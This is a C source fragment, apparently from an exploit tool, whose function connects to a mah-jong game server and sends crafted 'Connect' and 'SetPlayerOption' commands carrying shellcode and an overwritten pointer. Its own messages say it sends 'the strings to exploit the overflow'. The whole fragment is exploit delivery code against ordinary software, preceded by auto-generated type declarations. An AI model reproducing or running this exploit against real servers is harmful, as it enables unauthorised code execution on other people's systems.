
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int s ;


 int AF_INET ;
 int IPPROTO_TCP ;
 int SIGALRM ;
 int SOCK_STREAM ;
 int TIMEOUT ;
 int alarm (int ) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int getcode () ;
 struct hostent* gethostbyname (char*) ;
 int getptr (unsigned int) ;
 int htons (unsigned short) ;
 int inet_addr (char*) ;
 int memcpy (char*,char*,int) ;
 int mj_printf (int,char*,int ) ;
 int printe (char*,int) ;
 int printf (char*,...) ;
 int sig_alarm ;
 int signal (int ,int ) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;

unsigned short mj_connect(char *hostname,unsigned short port,
unsigned int newptr){
 int sock;
 struct hostent *t;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){
  if(!(t=gethostbyname(hostname)))
   printe("couldn't resolve hostname.",1);
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("mah-jong connection failed.",1);
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n",hostname,port);
 printf("[*] sending the strings to exploit the overflow.\n");
 mj_printf(sock,"Connect 1034 0 %s\n",getcode());
 mj_printf(sock,"SetPlayerOption %s\n",getptr(newptr));
 sleep(1);
 close(sock);
 return(0);
}
